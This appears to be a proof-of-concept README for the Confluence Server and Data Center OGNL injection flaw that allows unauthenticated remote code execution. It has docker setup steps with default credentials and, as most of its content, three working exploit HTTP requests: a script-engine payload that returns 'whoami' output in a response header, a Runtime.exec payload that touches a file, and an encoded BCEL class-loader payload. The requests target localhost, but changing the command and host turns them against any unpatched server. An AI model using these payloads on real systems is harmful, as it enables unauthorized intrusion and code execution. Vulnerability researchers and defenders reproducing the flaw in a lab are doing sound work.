Atlassian has been made aware of current active exploitation of a critical severity unauthenticated remote code execution vulnerability in Confluence Data Center and Server. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.
Run
docker-compose upFollow the installation guild and setup the database with
user: postgres
passwd: postgres
database: confluence
Sending the request
GET /%24%7B(Class.forName(%22jav%22+%22ax.script.ScriptEngineManager%22).newInstance().getEngineByName(%22js%22).eval(%22var%20p%20%3D%20org.apache.commons.io.IOUtils.toString(java.lang.Runtime.getRuntime().exec('whoami').getInputStream(),'utf-8')%3B%20com.opensymphony.webwork.ServletActionContext.getResponse().setHeader('X-Cmd-Response',p)%3B%22))%7D/ HTTP/1.1
Host: localhost:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
or a brief poc but witout command execution reply in response.
GET /%24%7B(Class.forName(%22java%22+%22.lang.Runtime%22).getMethod(%22getRuntime%22,%20null).invoke(null,%20null).exec(%22touch%20/tmp/success%22))%7D/ HTTP/1.1
Host: localhost:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*or with bcel ClassLoader
GET /%24%7B(Class.forName(%22org.ap%22+%22ache.bcel.util.ClassLoader%22).newInstance().loadClass(%22$$BCEL$$$l$8b$I$A$A$A$A$A$A$AmQMO$h1$Q$7dN$96$ecv1M$I$J$l$z$z$l$fd$m$c9$a1$x$qn$m$$$VHU$b7$Nj$Q$9c$j$c7$K$a6$c9$3a$dax$x$feQ$cf$5c$d2$aa$H$7e$A$3f$K1$5eR$KmW$da$Z$cf$bc$997$cf$e3$eb$9b_W$Av$d0$K$f1$E$cb$nV$f0$y$c0s$e7W$5d$e6$85$8f$97$nJX$f3$b1$eec$83$a1$b4$a7$Tm$f7$Z$8a$8d$e6$J$83$f7$de$f4$UC9$d6$89$fa$9c$N$bb$w$3d$W$dd$Be$aa$b1$91bp$oR$ed$e2i$d2$b3gz$cc0$lK3$8cl$da$XIODGF$ee2$E$7br0efTY$8f$cf$c57$Ri$T$7dh$l$5cH5$b2$da$qT6$d7$b1B$7e$fd$qF9$p$89c$I$3b$sK$a5$3a$d4nB$40l$ef$5c$xG$88Y$l$9b$i$af$f0$9aa$c1$9aL$9e$adGv8$8a$c6$99$94j$3c$de$e6x$83$b7$i$5bh$Q$fe$9fq$iM$cc$d2$dd$fe$S$cbP$c9$8b$H$o$e9G$ed$ee$b9$92$96$ae$f4$t$f5$rK$ac$k$92$96$b0$af$ec$7dPo4$e3$7fj$e8B$9e$baPD$b9$d5x$80vl$aa$93$fe$ee$c3$86$a3$d48$cdnQ$d6$dc$e1$M$b5G$9c$d3$$$S$3c$a2$83$cd$Xu$9c$K$a9$b0$81$80$9e$d2$7d$F0$b7$X$b2$9c$a2$88$3c$p$3f$d3$fa$Bv$99$c3sdKwI$3c$r$cb$a7$e72$w$e4$D$cc$df7$f7r2$a0$fe$T$85jq$Co$82$99$d3$ef$I$3e$b6$s$f0$_s$88S$5b$J$c5$9ct$91H$i$B$t$822$a9$a9$90$8e$gE$bf$87T$e0$a1$8a$F$8aj$f4$fb$u$b4$7d$d4$3d$C$Ws$5dK$b7M$fe$b8$8b$a9$C$A$A%22).newInstance())%7D/ HTTP/1.1
Host: localhost:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*it will create /tmp/success1 file.
